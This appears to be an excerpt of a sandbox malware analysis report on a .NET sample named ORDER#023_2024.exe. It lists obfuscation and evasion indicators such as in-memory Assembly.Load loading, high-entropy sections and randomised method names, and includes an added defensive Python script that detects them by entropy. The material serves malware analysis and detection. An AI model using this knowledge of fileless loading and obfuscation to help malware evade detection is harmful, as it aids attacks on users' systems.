                        Source: ORDER#023_2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LCgYKpJHO2S8TItW51.cs | .Net Code: e2sKbhnwKs System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORDER#023_2024.exe.53d0000.4.raw.unpack, L2.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LCgYKpJHO2S8TItW51.cs | .Net Code: e2sKbhnwKs System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORDER#023_2024.exe.3ba1d60.3.raw.unpack, L2.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
(Assembly.Load(byte[]) maps a managed assembly directly from a memory buffer, so the next stage never has to exist as a file on disk; the method names shown before the API, such as e2sKbhnwKs, are the callers found in the dumped code.)
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 0_2_02A3EE60 push esp; iretd 0_2_02A3EE61
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 0_2_06F51711 push eax; iretd 0_2_06F5171D
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_014CFAC1 push es; ret 5_2_014CFAD0
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_067F26B0 push es; ret 5_2_067F26C0
Source: ORDER#023_2024.exe | Static PE information: section name: .text entropy: 7.767634101805021
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, PRGi5AO7gC1weP7l0w.cs | High entropy of concatenated method names: 'uyMR1wbD1g', 'B8hRA6y39m', 'ChoR6IZ6Er', 'VMcRpx58is', 'onTRiZ25lA', 'MSrRXXLCr0', 'jcuRhA0hyO', 'Yp5RjgslrC', 's7eR0YhYQt', 'L91RIMKOur'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, X5DkZbFK444lv0qKDqV.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sTdolwte3v', 'oc9oLxCqUf', 'GNgou0DbNW', 'Qa6ooxyhOS', 'vxdovZuO5m', 'r42oHJWXLC', 'OwGoVMgsWy'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, cLJtNBzKxUGKXEZnr5.cs | High entropy of concatenated method names: 'H9RL25xK7x', 'u2pL1Vyp5h', 'ymRLAvKGD9', 'sOxL6bFmW7', 'Lb2Lp3dDlG', 'GCRLi8Scyr', 'OevLXXOfqr', 'R6BLVvNcV2', 'qW0L7B4E22', 'GRsLPLF2mj'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, pUkUmcdcWxcrZPseP1.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oInQBLcYOC', 'BBJQrcVCUC', 'AlGQzR07rf', 'FiRmDXrdAj', 'iJ2mFqss8r', 'OUvmQh2Xd3', 'lPMmmMIDJC', 'pIH2Vxey19axAhHM8Tl'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, gQaaabgjPI9S2v7bX6.cs | High entropy of concatenated method names: 'oiFWyX4tff', 'LASWrqsW2F', 'OW53DURc10', 'NTi3FDMbYu', 'dq9WIqenf6', 'MnYWYTWelW', 'PwbWOP4TGd', 'ABhWZQLlem', 'P9IWEFFp92', 'fJsWT7d0aS'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, deQuraBNTFd11kZQNZ.cs | High entropy of concatenated method names: 'yKSl6CaVLc', 'LTolpqy5hx', 'onNlGp1cBn', 'S61liilGjq', 'JeVlXCaHss', 'kFTlN6ZiEM', 'IdAlhecOkl', 'gi0ljjl2f4', 'qXEl5sqjAM', 'W3wl07RycF'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, EsI8Kis0mhboOFwANE.cs | High entropy of concatenated method names: 'eIBS8FAr9e', 'WkmSUkPLbk', 'dt0dGtuLbD', 'mBwdisagaK', 'vkedXyBerU', 'BsTdNQofiJ', 'j5odhgJFFF', 'fZrdjExa0M', 'f7ud59ab3y', 'x9Ud0uifn6'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, aYL7OIagM3xfR7HlyX.cs | High entropy of concatenated method names: 'ubNWqrKAqF', 'mlJW4YFO7n', 'ToString', 'S6MWe9NBO0', 'vEHWC8Y7C1', 'qC2WdojVk0', 'SNEWSiPDXD', 'uFWWkwGxdS', 'lpjWw6rgPi', 'fNnWJP8pTk'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, g58dCb1xNyIgM5il43.cs | High entropy of concatenated method names: 'mYLCZfZKaD', 'BCqCEpZlA2', 'DjnCTqoapT', 'u3rCaSMWTw', 'hOGCMt3ITl', 'HI4Cgt700P', 'ECaCcETmL3', 'J9gCy0m2Ut', 'fZJCBVQ5gg', 'D5HCrSuvbX'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, sPMQ5MZRKlspA1tXW9.cs | High entropy of concatenated method names: 'Jusx01hfuZ', 'i3wxYgSePK', 'QYixZd7oba', 'qkSxEdKyxn', 'scExpahyFt', 'BcQxGtLmuS', 'FMfxinjEjC', 'yW4xXYpMf7', 'BFqxNvM6Jm', 'df9xhR50YF'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LCgYKpJHO2S8TItW51.cs | High entropy of concatenated method names: 'AZsmfhwljj', 'QhCmeBZH42', 'FW0mC0MJQo', 'vCWmdlnH4r', 'J6WmSH8ALa', 'AaYmkTEO6U', 'Sn2mw2OOvd', 'k7imJDjdP7', 'yTwm9f919W', 'GgYmqgbh3I'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LTJ54hcgJyVq4qwIaU.cs | High entropy of concatenated method names: 'NTdlxUw5Yi', 'AvtlWpMOAc', 'VnjllNXyIM', 'QZilua5ACY', 'd8ulvVhYUR', 'Eb6lVyP0ir', 'Dispose', 'LiH3e0oDQA', 'VMt3CpclcK', 'dfZ3dvaehy'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, jQXKVCCbaUgppx8D74.cs | High entropy of concatenated method names: 'Dispose', 'WVqFB4qwIa', 'dr7Qp55EfL', 'IwEoMVKlAE', 'C17FrE9QUh', 'QlnFzyEATM', 'ProcessDialogKey', 'WlmQDeQura', 'KTFQFd11kZ', 'bNZQQRHRdJ'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, YhvwW2A0kpaKtdhK3I.cs | High entropy of concatenated method names: 'cFudnnvHJC', 'Vvad2SXZuC', 'kWBd1JVItW', 'RASdANf7MN', 'yQDdxV5KiW', 'dxVdtD5aF2', 'kLedWYVqc6', 'qCGd3YiRq4', 'caldl8GBfw', 'soVdLsMQlm'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, dFDAWt5kTHYbMkJMpD.cs | High entropy of concatenated method names: 'mCYw7Q9bSS', 'oSLwPSlO6P', 'sA1wbrg10j', 'BRRwnRyWiV', 'iEDw8JNsWh', 'Fcww2K5ee0', 'JgCwUUfqXC', 'Wtjw1fFmxI', 'pFTwAWPhit', 'Q5wwsPIOqt'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, z6XscJ6vdpxEoclvPA.cs | High entropy of concatenated method names: 'zERkfrkuwE', 'oQMkCvoqgZ', 'EerkSOABVR', 'nA0kw1WWim', 'rw9kJJOG4r', 'JJMSMsEpMp', 'S05SgHQXR8', 'gwQScE8Afn', 'VMeSyVqbZH', 'O5aSB7AxqS'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, nHRdJqrWBCQAiP7Qb0.cs | High entropy of concatenated method names: 'eHhLdxe3Jw', 'mSDLS8KwlJ', 'IZlLkegYqr', 'QdaLwwNyy7', 'XbNLlhfPBO', 'RXELJB7LJ2', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, N2J62jQc7ybumY3Xkb.cs | High entropy of concatenated method names: 'TeKbPa7X5', 'If7nTIXjK', 'BoV2LPw0M', 'xgkUaUExq', 'XT9Ag5TTO', 'ifEsnG3eS', 'ia2f0QNC5IjP21oXAL', 'hwMdhlBuHBxlNrZbD8', 'xhi3GZLct', 'Jv2LTU2FP'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, raADa7FQtYsyBmlXbnb.cs | High entropy of concatenated method names: 'ToString', 'Xslu1MbqWw', 'WTjuAOyy5w', 'sqqusHA2ap', 'ReYu6x3CSy', 'ds9upRSG5G', 'T5wuGBlBcb', 'K8Huinot7u', 'fAkJQFjrZEOF88mdGaV', 'JqFNkEjT0fXwx4I2QRS'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, NowMJVFDBjDQLXHi9mx.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vUHLIGymjO', 'YVbLYQZrmH', 'cqULONTT0Y', 'XNnLZlFDXg', 'AR1LEg12r9', 'Fd8LTZeHTH', 'rSnLaut5Da'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, jw7ygmFFcUaSatAc2D4.cs | High entropy of concatenated method names: 'SBMLr4Cor2', 'fq6LzkCbZF', 'fFouDfmpBp', 'iq2uFtbhqq', 'CRouQYUnNU', 'rwNumGSdVD', 'I0ouKCWW5s', 'KYEufuEcmA', 'wuwue7j65L', 'tSUuCyXwgZ'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, JTgEbKhbABArjRRoho.cs | High entropy of concatenated method names: 'IWZweIPyqx', 'DiTwd0Mmm3', 'FVkwkbZtlJ', 'QtikrCCbQY', 'oGAkzJ5xXY', 'pBVwDaPf1t', 'ajwwFDitpy', 'l0UwQcZcJ5', 'Oa8wm8Y2nS', 'n4rwKhgmQ0'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, nhHaQcK5gEaIGUBLTo.cs | High entropy of concatenated method names: 'VPCFw58dCb', 'oNyFJIgM5i', 'C0kFqpaKtd', 'LK3F4IAsI8', 'bwAFxNEn6X', 'FcJFtvdpxE', 'OWPRsPT4RQ9gGmUnbd', 'KE9OjgdIlbiKMmunlB', 'H59FFgOHEA', 'gigFmBudIF'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, PRGi5AO7gC1weP7l0w.cs | High entropy of concatenated method names: 'uyMR1wbD1g', 'B8hRA6y39m', 'ChoR6IZ6Er', 'VMcRpx58is', 'onTRiZ25lA', 'MSrRXXLCr0', 'jcuRhA0hyO', 'Yp5RjgslrC', 's7eR0YhYQt', 'L91RIMKOur'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, X5DkZbFK444lv0qKDqV.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sTdolwte3v', 'oc9oLxCqUf', 'GNgou0DbNW', 'Qa6ooxyhOS', 'vxdovZuO5m', 'r42oHJWXLC', 'OwGoVMgsWy'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, cLJtNBzKxUGKXEZnr5.cs | High entropy of concatenated method names: 'H9RL25xK7x', 'u2pL1Vyp5h', 'ymRLAvKGD9', 'sOxL6bFmW7', 'Lb2Lp3dDlG', 'GCRLi8Scyr', 'OevLXXOfqr', 'R6BLVvNcV2', 'qW0L7B4E22', 'GRsLPLF2mj'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, pUkUmcdcWxcrZPseP1.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oInQBLcYOC', 'BBJQrcVCUC', 'AlGQzR07rf', 'FiRmDXrdAj', 'iJ2mFqss8r', 'OUvmQh2Xd3', 'lPMmmMIDJC', 'pIH2Vxey19axAhHM8Tl'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, gQaaabgjPI9S2v7bX6.cs | High entropy of concatenated method names: 'oiFWyX4tff', 'LASWrqsW2F', 'OW53DURc10', 'NTi3FDMbYu', 'dq9WIqenf6', 'MnYWYTWelW', 'PwbWOP4TGd', 'ABhWZQLlem', 'P9IWEFFp92', 'fJsWT7d0aS'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, deQuraBNTFd11kZQNZ.cs | High entropy of concatenated method names: 'yKSl6CaVLc', 'LTolpqy5hx', 'onNlGp1cBn', 'S61liilGjq', 'JeVlXCaHss', 'kFTlN6ZiEM', 'IdAlhecOkl', 'gi0ljjl2f4', 'qXEl5sqjAM', 'W3wl07RycF'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, EsI8Kis0mhboOFwANE.cs | High entropy of concatenated method names: 'eIBS8FAr9e', 'WkmSUkPLbk', 'dt0dGtuLbD', 'mBwdisagaK', 'vkedXyBerU', 'BsTdNQofiJ', 'j5odhgJFFF', 'fZrdjExa0M', 'f7ud59ab3y', 'x9Ud0uifn6'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, aYL7OIagM3xfR7HlyX.cs | High entropy of concatenated method names: 'ubNWqrKAqF', 'mlJW4YFO7n', 'ToString', 'S6MWe9NBO0', 'vEHWC8Y7C1', 'qC2WdojVk0', 'SNEWSiPDXD', 'uFWWkwGxdS', 'lpjWw6rgPi', 'fNnWJP8pTk'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, g58dCb1xNyIgM5il43.cs | High entropy of concatenated method names: 'mYLCZfZKaD', 'BCqCEpZlA2', 'DjnCTqoapT', 'u3rCaSMWTw', 'hOGCMt3ITl', 'HI4Cgt700P', 'ECaCcETmL3', 'J9gCy0m2Ut', 'fZJCBVQ5gg', 'D5HCrSuvbX'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, sPMQ5MZRKlspA1tXW9.cs | High entropy of concatenated method names: 'Jusx01hfuZ', 'i3wxYgSePK', 'QYixZd7oba', 'qkSxEdKyxn', 'scExpahyFt', 'BcQxGtLmuS', 'FMfxinjEjC', 'yW4xXYpMf7', 'BFqxNvM6Jm', 'df9xhR50YF'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LCgYKpJHO2S8TItW51.cs | High entropy of concatenated method names: 'AZsmfhwljj', 'QhCmeBZH42', 'FW0mC0MJQo', 'vCWmdlnH4r', 'J6WmSH8ALa', 'AaYmkTEO6U', 'Sn2mw2OOvd', 'k7imJDjdP7', 'yTwm9f919W', 'GgYmqgbh3I'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LTJ54hcgJyVq4qwIaU.cs | High entropy of concatenated method names: 'NTdlxUw5Yi', 'AvtlWpMOAc', 'VnjllNXyIM', 'QZilua5ACY', 'd8ulvVhYUR', 'Eb6lVyP0ir', 'Dispose', 'LiH3e0oDQA', 'VMt3CpclcK', 'dfZ3dvaehy'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, jQXKVCCbaUgppx8D74.cs | High entropy of concatenated method names: 'Dispose', 'WVqFB4qwIa', 'dr7Qp55EfL', 'IwEoMVKlAE', 'C17FrE9QUh', 'QlnFzyEATM', 'ProcessDialogKey', 'WlmQDeQura', 'KTFQFd11kZ', 'bNZQQRHRdJ'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, YhvwW2A0kpaKtdhK3I.cs | High entropy of concatenated method names: 'cFudnnvHJC', 'Vvad2SXZuC', 'kWBd1JVItW', 'RASdANf7MN', 'yQDdxV5KiW', 'dxVdtD5aF2', 'kLedWYVqc6', 'qCGd3YiRq4', 'caldl8GBfw', 'soVdLsMQlm'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, dFDAWt5kTHYbMkJMpD.cs | High entropy of concatenated method names: 'mCYw7Q9bSS', 'oSLwPSlO6P', 'sA1wbrg10j', 'BRRwnRyWiV', 'iEDw8JNsWh', 'Fcww2K5ee0', 'JgCwUUfqXC', 'Wtjw1fFmxI', 'pFTwAWPhit', 'Q5wwsPIOqt'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, z6XscJ6vdpxEoclvPA.cs | High entropy of concatenated method names: 'zERkfrkuwE', 'oQMkCvoqgZ', 'EerkSOABVR', 'nA0kw1WWim', 'rw9kJJOG4r', 'JJMSMsEpMp', 'S05SgHQXR8', 'gwQScE8Afn', 'VMeSyVqbZH', 'O5aSB7AxqS'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, nHRdJqrWBCQAiP7Qb0.cs | High entropy of concatenated method names: 'eHhLdxe3Jw', 'mSDLS8KwlJ', 'IZlLkegYqr', 'QdaLwwNyy7', 'XbNLlhfPBO', 'RXELJB7LJ2', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, N2J62jQc7ybumY3Xkb.cs | High entropy of concatenated method names: 'TeKbPa7X5', 'If7nTIXjK', 'BoV2LPw0M', 'xgkUaUExq', 'XT9Ag5TTO', 'ifEsnG3eS', 'ia2f0QNC5IjP21oXAL', 'hwMdhlBuHBxlNrZbD8', 'xhi3GZLct', 'Jv2LTU2FP'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, raADa7FQtYsyBmlXbnb.cs | High entropy of concatenated method names: 'ToString', 'Xslu1MbqWw', 'WTjuAOyy5w', 'sqqusHA2ap', 'ReYu6x3CSy', 'ds9upRSG5G', 'T5wuGBlBcb', 'K8Huinot7u', 'fAkJQFjrZEOF88mdGaV', 'JqFNkEjT0fXwx4I2QRS'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, NowMJVFDBjDQLXHi9mx.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vUHLIGymjO', 'YVbLYQZrmH', 'cqULONTT0Y', 'XNnLZlFDXg', 'AR1LEg12r9', 'Fd8LTZeHTH', 'rSnLaut5Da'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, jw7ygmFFcUaSatAc2D4.cs | High entropy of concatenated method names: 'SBMLr4Cor2', 'fq6LzkCbZF', 'fFouDfmpBp', 'iq2uFtbhqq', 'CRouQYUnNU', 'rwNumGSdVD', 'I0ouKCWW5s', 'KYEufuEcmA', 'wuwue7j65L', 'tSUuCyXwgZ'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, JTgEbKhbABArjRRoho.cs | High entropy of concatenated method names: 'IWZweIPyqx', 'DiTwd0Mmm3', 'FVkwkbZtlJ', 'QtikrCCbQY', 'oGAkzJ5xXY', 'pBVwDaPf1t', 'ajwwFDitpy', 'l0UwQcZcJ5', 'Oa8wm8Y2nS', 'n4rwKhgmQ0'
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, nhHaQcK5gEaIGUBLTo.cs | High entropy of concatenated method names: 'VPCFw58dCb', 'oNyFJIgM5i', 'C0kFqpaKtd', 'LK3F4IAsI8', 'bwAFxNEn6X', 'FcJFtvdpxE', 'OWPRsPT4RQ9gGmUnbd', 'KE9OjgdIlbiKMmunlB', 'H59FFgOHEA', 'gigFmBudIF'
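The two heuristics behind the entries above, the .text section entropy of 7.77 and the "high entropy of concatenated method names" hits, are easy to reproduce. The following is an added example written for this page, not code from the Joe Sandbox report or from the analysed sample: it computes Shannon entropy over a PE image's section table in pure Python and over a .NET type's method names, using the readable and obfuscated names copied from the report as input. The minimal PE builder is a constructed test fixture so the script runs offline, and both thresholds are assumed rules of thumb rather than Joe Sandbox's own values.

```python
"""Entropy checks behind the report's Data Obfuscation hits (added example)."""
import math
import struct
from collections import Counter

SECTION_THRESHOLD = 7.0   # assumed: packed or encrypted code usually sits above this
NAME_THRESHOLD = 4.5      # assumed: readable identifiers sit well below this


def shannon_entropy(data) -> float:
    """Bits per symbol over bytes or str: 0.0 for a constant stream, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def method_name_entropy(names) -> float:
    """Character entropy of one type's method names joined together."""
    return shannon_entropy("".join(names))


def obfuscated_types(types: dict, threshold: float = NAME_THRESHOLD) -> list:
    """Type names whose concatenated method names exceed the threshold."""
    return [t for t, names in types.items() if method_name_entropy(names) > threshold]


# Method names copied from the report: readable TypeConverter methods beside an obfuscated type.
READABLE = ["CanConvertFrom", "ConvertFrom", "ConvertTo"]
OBFUSCATED = ["uyMR1wbD1g", "B8hRA6y39m", "ChoR6IZ6Er", "VMcRpx58is", "onTRiZ25lA",
              "MSrRXXLCr0", "jcuRhA0hyO", "Yp5RjgslrC", "s7eR0YhYQt", "L91RIMKOur"]


def section_entropies(pe: bytes) -> dict:
    """Walk the section table of a PE image and return {section name: entropy of raw data}."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    first_hdr = coff + 20 + opt_size          # section headers follow the optional header
    result = {}
    for i in range(nsections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, first_hdr + 40 * i)
        result[name.rstrip(b"\0").decode()] = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
    return result


def packed_sections(entropies: dict, threshold: float = SECTION_THRESHOLD) -> list:
    """Section names at or above the threshold, as the report's .text at 7.77 would be."""
    return [name for name, h in entropies.items() if h >= threshold]


def build_test_pe(sections) -> bytes:
    """Constructed fixture: DOS stub, COFF header, zeroed PE32 optional header, sections."""
    e_lfanew = 0x40
    optional = b"\x0b\x01" + b"\0" * 94      # PE32 magic, remaining fields zeroed
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(optional), 0x102)
    raw_ptr = e_lfanew + 4 + len(coff) + len(optional) + 40 * len(sections)
    headers, payload = b"", b""
    for name, blob in sections:
        headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(blob), 0x1000,
                               len(blob), raw_ptr, 0, 0, 0, 0, 0x60000020)
        payload += blob
        raw_ptr += len(blob)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    return dos + b"PE\0\0" + coff + optional + headers + payload


if __name__ == "__main__":
    # .text holds uniformly distributed bytes (as packed code would), .rdata a constant run.
    image = build_test_pe([(b".text", bytes(range(256)) * 4), (b".rdata", b"A" * 1024)])
    for name, h in section_entropies(image).items():
        print(f"{name:8} entropy {h:.3f}")
    print("high-entropy sections:", packed_sections(section_entropies(image)))
    print("readable names  :", round(method_name_entropy(READABLE), 2))
    print("obfuscated names:", round(method_name_entropy(OBFUSCATED), 2))
    print("flagged types   :", obfuscated_types({"readable_sample": READABLE,
                                                "PRGi5AO7gC1weP7l0w": OBFUSCATED}))
```

On real samples, point `section_entropies` at the file bytes instead of the fixture; a .text section near 8 bits per byte, as here, means the code is compressed or encrypted and the unpacked dumps, not the file on disk, are what to reverse. The name check is a per-type measure: types that mix framework overrides such as `ConvertFrom` or `Dispose` with random identifiers still score high, which is why the report flags them.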

Hooking and other Techniques for Hiding and Protection
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 times)
(PowerShell reads module manifests under $PSModulePath while resolving commands, so these opens on their own do not show a BitLocker cmdlet being run.)
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Process information set: NOOPENFILEERRORBOX (repeated 45 times; SetErrorMode with SEM_NOOPENFILEERRORBOX, which suppresses the message box shown when a file cannot be found)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
